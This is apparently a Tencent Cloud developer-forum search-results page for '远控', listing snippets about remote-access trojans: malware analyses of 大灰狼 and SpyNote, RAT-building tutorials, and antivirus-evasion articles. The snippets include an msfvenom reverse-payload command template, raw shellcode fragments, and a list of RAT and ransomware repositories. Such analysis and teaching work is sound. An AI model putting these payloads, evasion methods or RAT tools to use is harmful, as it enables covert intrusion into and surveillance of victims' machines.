- 综合排序
- 最热优先
- 最新优先
- 来自专栏音视频咖
5G远控创新与探索,超低时延的远控传输
本期我们邀请了腾讯云音视频专家工程师——白松灵,为大家分享5G远控技术创新探索以及腾讯云在超低延时传输上的技术实践。 5G是当前的新趋势。 传统4G满足不了的很多需要更大带宽、更低延时的需求,比如云游戏、VR/AR、4K/8K、全景直播等需要超大带宽的应用,在4G下无法实现,通过5G则可以满足;而远程手术、远程会议、远程会诊、自动驾驶等超低延时的应用场景 在矿山、冶金、港口以及开放道路等场景中,通过5G远控技术可以将实际操作的安全员从车上解放出来,实现真正的无人,甚至可以实现一名驾驶员控制多台车辆,解放更多人力成本。 未来我们将持续拓展更多的5G远程实时控制场景,让远控技术可以造福更多的行业。同时,我们也会持续致力于不断提升远控相关的性能与指标并探索更多的方式来增强远控的操控体验。
2.9K30编辑于 2023-01-18 LySocket 远程ShellCode种植远控
进程名 -------------------------------------------------------------------- 0 4 568 x64 smss.exe 3 856 x64 csrss.exe 4
1.3K20编辑于 2022-12-28- 来自专栏大侠之运维
轻量化的远控工具
natpass:轻量级远程控制工具在今天的数字化时代,远程控制工具变得越来越重要,无论是用于远程技术支持、服务器管理还是其他远程操作。 广泛的用途:natpass可用于远程技术支持、服务器管理、远程开发、远程维护等各种用途,帮助用户更好地管理和控制计算机和服务器。 natpass的部署过程要使用natpass,您需要将其部署到服务器端、受控端和控制端。下面是针对debian系统的部署过程示例:服务器端部署在服务器上下载natpass,并将其解压到任意目录。 使用以下命令启动服务器端程序,使用sudo以管理员权限运行: sudo . (可选)修改local.yaml配置文件,将server地址设置为服务器端的地址。
71210编辑于 2024-10-09 - 来自专栏极安御信安全研究院
远控木马病毒分析
一、病毒简介SHA256:880a402919ba4e896f6b4b2595ecb7c06c987b025af73494342584aaa84544a1MD5:0902b9ff0eae8584921f70d12ae7b391SHA1 结合这里,在IDA中静态分析,进入winmain,F5看伪代码:以上就是main函数主体,接下来对关键函数进行详细分析:3.1、sub-406A30进入函数内部,是俩个函数:根据特征,很明显这里是rc4的解密 这是一套令牌提权的组合拳,返回上一层;这里是拿到句柄复制句柄; 3.7.2、sub_4066C0这边就开始和服务通信sub_401470:sub_401660:这里有一个开辟线程,进入回调函数发现,是和服务器链接 ,接受内容,并通过rc4解密,在自身开辟空间,进行写入操作,后面这块分析比较粗浅,但大体内容就是这些;
1.1K21编辑于 2023-08-24 - 来自专栏七夜安全博客
Ares:基于Python的BS远控
Ares远控 前言 本文介绍一个比较有意思的基于Python的远程控制工具Ares。 Ares远控采用B/S架构,基于Python2,Server端使用Flask进行开发,整体在浏览器就可以轻易操作。 第二节 优势与不足 这个使用Python开发的B/S远控,整体来说实现一个远控的基本功能。 pyinstaller带包成二进制文件 使用http协议进行交互,防火墙不会拦截 不足: 使用py2开发,不兼容py3 并发性差 循环采用http询问,效率低下,容易被发现 http数据域没有被加密,保密性差 打算对这个远控进行重写
1.9K30发布于 2018-06-26 - 来自专栏Ms08067安全实验室
红队作业 | 钉钉机器人远控服务器体验
文章来源|MS08067 红队培训班 第5期 本文作者:thresh(红队培训班5期学员) 0x01 钉钉机器人远控 钉钉,阿里巴巴出品,专为全球企业组织打造的智能移动办公平台,含PC版,IPad和手机版 本次作业是使用钉钉机器人来实现远控服务器! 4、调试 在钉钉开放平台上选择调试 打开钉钉,会有一个TEST版本的群聊,可以在里面进行测试 可以看到,命令执行成功,服务器端请求成功 参考: 钉钉机器人设置: https://open.dingtalk.com \x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" buf += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' --type DeleteValue --key 'shell' 0x04 总结 钉钉机器人的服务端远控
2K20编辑于 2022-04-06 - 来自专栏高性能服务器开发
大灰狼远控木马源码分析
大灰狼远程控制木马是一个较为常见的远控工具,不同的木马病毒团伙对其定制改造后发布了诸多变种。本章将从启动过程、通信协议、远控功能三个方面逆向分析该木马的实现原理。 init ; 初始化RC4密钥 .text:0040684D lea ecx, [esp+0A054h+var_A024] .text:00406851 all connect_server ; 连接服务器 16.5 远控功能分析 远控功能分析如代码清单 16-5 所示。 服务器管理代码分析如代码清单 16-13 所示。 有了对大灰狼远控木马的分析,读者可以根据病毒的实现原理,编写对应的修复、防御工具,制作针对大灰狼远控木马的专杀软件。 本文摘编自《C++反汇编与逆向分析技术揭秘(第2版)》,经出版方授权发布。
7.5K40编辑于 2021-12-08 - 来自专栏FreeBuf
应急响应之大灰狼远控分析
目标IP:139.159.227.182,使用微步对该IP进行分析,发现该IP服务器存在病毒样本数据,详细如下: ? 确认该信息后,使用杀软对系统进行病毒查杀,但并未发现异常: ? 对此不太甘心,因此做了一下操作: 在防火墙封锁该IP,禁止与互联网进行通信; 进入系统对进程信息进行分析,判断是否存在问题; 对外联流量的对象系统进行渗透; 第二章、大灰狼远控木马分析 使用process 将路径C:\Program Files\AppPatch与文件名dll进行拼接; 3、在C:\Program Files\AppPatch路径下创建文件dll文件,并执行netsys96.dll文件; 4、
2.3K20发布于 2020-08-17 - 来自专栏FreeBuf
当心,安卓远控(spynote)升级了……
最近在某国外论坛上流出一款安卓远控spynote3.2版本,以前freebuf上有人发过spynots2.4版的,不过现在已经升级了,功能变得更加强大,危害更严重。 和以前的几个android远控相比(droidjack, android RAT, dendroid)相比,此次的更新亮点不多,只不过是对现在的安卓升级版本的跟进而已。 可以看到,和以往的远控一样,做好端口映射,定制图标,包名,版本号等等,还可以和别的apk文件捆绑,不过经测试好像有bug,并不能正常使用。生成带木马的apk文件,安装之后上线。 基本功能: 1、可以生成一个APK,绑定在被控手机的任何APP上 2、可在电脑端控制手机,包括浏览、传输、删除文件等 3、可进行SMS短信收发和查看功能 4、可以控制手机的电话功能 5、联系人管理 6、
3.4K80发布于 2018-02-24 - 来自专栏信息安全必修课
使用kali msfvenom编写远控木马“实验”
打开终端并输入以下命令:msfvenom -p [payload] LHOST=[IP地址] LPORT=[端口号] -f [格式] -o [文件名]
2.7K51编辑于 2023-04-23 C++ Boost 实现异步IO远控
Boost 利用ASIO框架实现一个跨平台的反向远控程序,该远控支持保存套接字,当有套接字连入时,自动存储到map容器,当客户下线时自动从map容器中移除,当我们需要与特定客户端通信时,只需要指定客户端
1.3K20编辑于 2022-12-28- 来自专栏FreeBuf
瞄准金融行业的远控木马:SpyNote
上面都是共享 C&C 服务器的应用程序。 CypherRat 地下销售 该恶意软件家族的最新变种 SpyNote.C 在 Telegram 进行出售,且名为 CypherRat。 卓越的能力 SpyNote.C 恶意软件变种执行的独特功能,在 2022 年具有远控功能更的恶意软件中被识别出来。 收到攻击者的命令后,攻击者的 C&C 服务器会收到从网页获取的凭据和信息。 IOC 6f606bc5004af2b90b66d6e6e4f29f35a3b4a31dc6974b55434b3c53d70584a4 114fa822d7a96169c9cd48303f7fbd1af94f57cb46fec576d91ccea11bc5d974 4779c469c50d157d2140d39fc9b034c931b5224e886bcb60024687fe4022063e a2a95cfccb8fbe557f605b8a47dad901d3a25f8cdae7f0beee133f60b924c45a bade089b4dfdea057132551deb997ba8a25c4d1ced32f78975239c73241181f4
2.5K30编辑于 2023-02-10 - 来自专栏kali blog
Kage——msf可视化远控平台
Kage,一个把msf变成可视化远控平台的工具。 项目地址 https://github.com/WayzDev/Kage/ 下载安装 点我下载哈~ 下载后,给予运行权限。
1.5K10编辑于 2021-12-17 - 来自专栏Ms08067安全实验室
远控杂说---总有一款适合你
你我相识,我们一同探索开源神器,如果喜欢小编,就赶紧关注我们, 让我们一起成长吧 部分图片 下面的图片展示了一部分远控的图片,里面包含了很多很多好玩有不错的事情。 ? ? ? ? 远控大集合列表 优秀神器大杂烩 https://github.com/quasar/QuasarRAT https://github.com/TheSph1nx/RT-101 https://github.com njRAT-v0.7d https://github.com/zerosum0x0/koadic 恶作剧型 https://github.com/NYAN-x-CAT/Lime-RAT 敲诈加密软件 手机远控 https://github.com/The404Hacking/AndroRAT 其他远控大集合 https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp https Tiked/Client https://github.com/werkamsus/Lilith https://github.com/5alt/ZeroRAT https://github.com/lu4p
2.2K20发布于 2019-09-24 - 来自专栏MicroPython
TPYBoard v202 智能WIFI远控小车
具体思路如下: 1、TPYBoard v202作为整个小车的核心控制部分,连接L298N电机驱动模块,实现小车的基本方向控制; 2、TPYBoard v202接入网络,开启Socket服务实现web服务器功能 = Pin(4,Pin.OUT) g5 = Pin(5,Pin.OUT) g12 = Pin(12,Pin.OUT) g13 = Pin(13,Pin.OUT) def Go(): g4.value (1) g5.value(0) g12.value(1) g13.value(0) def Back(): g4.value(0) g5.value(1) (0) def Right(): g4.value(0) g5.value(0) g12.value(1) g13.value(0) def Stop(): g4 IN2 G13(MO) IN3 G12(MI) IN4 L298N电机驱动 两侧电机 OUT1 车头朝前 OUT2 右侧电机 OUT3 车头朝前 OUT4 左侧电机
1.6K10发布于 2020-01-15 - 来自专栏FreeBuf
自己动手编写远控工具及检测思路
PS:本文仅用于技术讨论与交流,严禁用于任何非法用途,违者后果自负 在学习攻击渗透的过程中,不免会接触远控工具。 现有的远控工具很多,从大名鼎鼎的冰河到CHAOS。 本文详细介绍了一款最小功能集的远控工具的实现细节,按照步骤动手实现,不仅可以对于远控工具的背后思路有了更深的体会,也可以巩固自己在多线程、网络编程等方面的知识。 图4.客户端处理指令流程 三、重点问题解决 3.1持久化 一个远控工具除了支持服务端下发指令,客户端执行指令并回传结果的功能外,还需要可以对于自己进行持久化。 我们定义: 一条消息的头部4个字节为消息内容长度 头部后面再跟消息内容 图6.发送格式化的消息 当服务端接收到数据时,先解析头部4个字节得到消息的长度,再根据这个长度得到消息正文。
95410编辑于 2023-04-26 - 来自专栏网络安全技术点滴分享
Mass-RAT远控系统分析
系统概述 该系统是一个基于TCP Socket的远程文件管理系统,支持客户端与服务器之间的文件管理操作。 系统分为客户端和服务器两部分,客户端可以运行在Android和Windows平台上,服务器则运行在Windows平台上。客户端通过Socket与服务器通信,实现文件浏览、下载等操作。 Windows客户端:通过ClientSocket类与服务器通信,处理文件管理相关的请求。 服务器: Socket服务器:监听客户端连接,处理客户端的请求并返回相应的文件信息。 核心技术点 Socket通信: 客户端与服务器通过TCP Socket进行通信,使用Socket类进行数据传输。 服务器通过HandleFileManager类处理客户端的文件管理请求,并将结果返回给客户端。
19210编辑于 2025-06-16 - 来自专栏洛米唯熊
远控免杀专题-shellcode免杀实践
xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a \x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\ x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31 \xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\ x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0
3.1K10发布于 2020-03-12 - 来自专栏Ms08067安全实验室
远控免杀专题文章(4)-Evasion模块免杀(VT免杀率1271)
本专题文章导航 1、远控免杀专题文章(1)-基础篇:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 2、远控免杀专题文章(2)-msfvenom隐藏的参数 :https://mp.weixin.qq.com/s/1r0iakLpnLrjCrOp2gT10w 3、远控免杀专题文章(3)-msf自带免杀(VT免杀率35/69):https://mp.weixin.qq.com /s/A0CZslLhCLOK_HgkHGcpEA 4、远控免杀专题文章(4)-Evasion模块(VT免杀率12/71):本文 文章打包下载及相关软件下载:https://github.com/TideSec 4、其他杀软的检测指标是在virustotal.com(简称VT)上在线查杀,所以可能只是代表了静态查杀能力,数据仅供参考,不足以作为免杀的精确判断指标。
1.4K10发布于 2020-02-24 - 来自专栏闪石星曜CyberSecurity
自己动手编写远控工具及检测思路
来自 | FreeBuf PS:本文仅用于技术讨论与交流,严禁用于任何非法用途,违者后果自负 在学习攻击渗透的过程中,不免会接触远控工具。 现有的远控工具很多,从大名鼎鼎的冰河到CHAOS。 本文详细介绍了一款最小功能集的远控工具的实现细节,按照步骤动手实现,不仅可以对于远控工具的背后思路有了更深的体会,也可以巩固自己在多线程、网络编程等方面的知识。 一、总体结构 ? 图4.客户端处理指令流程 三、重点问题解决 3.1持久化 一个远控工具除了支持服务端下发指令,客户端执行指令并回传结果的功能外,还需要可以对于自己进行持久化。 由于我们的这款远控工具只是学习使用,所以不考虑绕过杀软的方法,使用写注册表的方式将自己设置为开机自启动: ?
2.5K20发布于 2021-02-12
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号